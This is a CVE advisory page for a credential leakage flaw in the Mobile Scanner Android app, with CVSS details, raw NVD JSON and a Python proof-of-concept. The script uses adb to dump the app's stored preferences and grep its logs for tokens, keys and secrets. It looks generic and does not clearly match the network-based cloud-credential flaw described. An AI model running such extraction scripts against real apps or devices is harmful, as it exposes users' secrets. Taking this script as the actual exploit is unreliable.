Security Vulnerability Report
CVE-2025-61121 CVSS 7.5 HIGH

CVE-2025-61121

Published: 2025-10-30 17:15:39
Last Modified: 2026-04-15 00:35:42

Description

Mobile Scanner Android App version 2.12.38 (package name com.glority.everlens), developed by Glority Global Group Ltd., contains a credential leakage vulnerability. Improper handling of cloud service credentials may allow attackers to obtain them and carry out unauthorized actions, such as sensitive information disclosure and abuse of cloud resources. Successful exploitation could result in privacy breaches and misuse of the platform infrastructure.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Mobile Scanner Android App (com.glority.everlens) <= 2.12.38

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61121 PoC - Mobile Scanner Credential Extraction
# This PoC demonstrates the credential leakage vulnerability
import subprocess
import os
import re


def extract_shared_prefs(app_package):
    """
    Extract SharedPreferences files containing credentials
    """
    cmd = f'adb shell run-as {app_package} ls files/shared_prefs/'
    try:
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        prefs_files = result.stdout.strip().split('\n')
        print(f'[+] Found {len(prefs_files)} SharedPreferences files')
        for pref_file in prefs_files:
            if pref_file:
                extract_cmd = f'adb shell run-as {app_package} cat files/shared_prefs/{pref_file}'
                content = subprocess.run(extract_cmd, shell=True, capture_output=True, text=True)
                print(f'\n[+] Contents of {pref_file}:')
                print(content.stdout)
                # Search for credential patterns
                credential_patterns = [
                    r'api[_-]?key',
                    r'token',
                    r'secret',
                    r'password',
                    r'credential',
                    r'auth'
                ]
                for pattern in credential_patterns:
                    if re.search(pattern, content.stdout, re.IGNORECASE):
                        print(f'[!!] Potential credential found with pattern: {pattern}')
    except Exception as e:
        print(f'[-] Error: {e}')


def check_logcat(app_package):
    """
    Check logcat for leaked credentials in app logs
    """
    print('\n[+] Checking logcat for credential leaks...')
    cmd = f'adb logcat -d | grep -i {app_package} | grep -iE "(token|key|secret|credential|auth)"'
    try:
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        if result.stdout:
            print('[!!] Possible credentials found in logs:')
            print(result.stdout)
        else:
            print('[-] No obvious credentials in logs')
    except Exception as e:
        print(f'[-] Error: {e}')


if __name__ == '__main__':
    TARGET_APP = 'com.glority.everlens'
    print(f'[*] Analyzing {TARGET_APP} for CVE-2025-61121')
    print('[*] Extracting stored credentials...')
    extract_shared_prefs(TARGET_APP)
    check_logcat(TARGET_APP)
    print('\n[*] Analysis complete')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61121", "sourceIdentifier": "[email protected]", "published": "2025-10-30T17:15:39.343", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mobile Scanner Android App version 2.12.38 (package name com.glority.everlens), developed by Glority Global Group Ltd., contains a credential leakage vulnerability. Improper handling of cloud service credentials may allow attackers to obtain them and carry out unauthorized actions, such as sensitive information disclosure and abuse of cloud resources. Successful exploitation could result in privacy breaches and misuse of the platform infrastructure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-523"}]}], "references": [{"url": "https://kar1oz.notion.site/Mobile-Scanner-2659a473ecb28058a9f3e06cff61781c", "source": "[email protected]"}]}}